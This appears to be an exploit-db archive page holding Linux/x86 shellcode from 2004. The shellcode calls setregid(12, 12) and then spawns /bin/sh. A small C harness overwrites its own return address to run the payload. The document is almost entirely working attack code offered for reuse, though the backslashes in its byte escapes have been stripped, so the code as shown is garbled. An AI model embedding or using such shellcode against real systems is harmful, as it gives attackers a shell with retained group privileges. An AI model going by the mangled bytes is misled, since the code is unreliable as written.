https://www.exploit-db.com/exploits/13447

漏洞细节尚未披露

/*
 *  Linux/x86
 *  An example of setregid(), execve() /bin/sh
 *
 *  (I used this in practise, hence the setregid(12, 12);)
 */

#include <stdio.h>

char c0de[] = 
/* main: */                            /* setregid(12, 12);        */
"x29xc0"                             /* subl %eax, %eax          */
"xb0x47"                             /* movb $71, %al            */
"x29xdb"                             /* subl %ebx, %ebx          */

/*
 *  Here's the GID for the setregid() call. Change to suit.
 */
"xb3x0c"                             /* movb $12, %bl            */
"x89xd9"                             /* movl %ebx, %ecx          */

"xcdx80"                             /* int $0x80                */
"xebx18"                             /* jmp callz                */

/* start: */ /* execve of /bin/sh */
"x5e"                                 /* popl %esi                */
"x29xc0"                             /* subl %eax, %eax          */
"x88x46x07"                         /* movb %al, 0x07(%esi)     */
"x89x46x0c"                         /* movl %eax, 0x0c(%esi)    */
"x89x76x08"                         /* movl %esi, 0x08(%esi)    */
"xb0x0b"                             /* movb $0x0b, %al          */
"x87xf3"                             /* xchgl %esi, %ebx         */
"x8dx4bx08"                         /* leal 0x08(%ebx), %ecx    */
"x8dx53x0c"                         /* leal 0x0c(%ebx), %edx    */
"xcdx80"                             /* int $0x80                */

/* callz: */
"xe8xe3xffxffxff"                 /* call start               */

/* /bin/sh */
"x2fx62x69x6ex2fx73x68";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(c0de));
        (*ret) = (int)c0de;
}

// milw0rm.com [2004-09-12]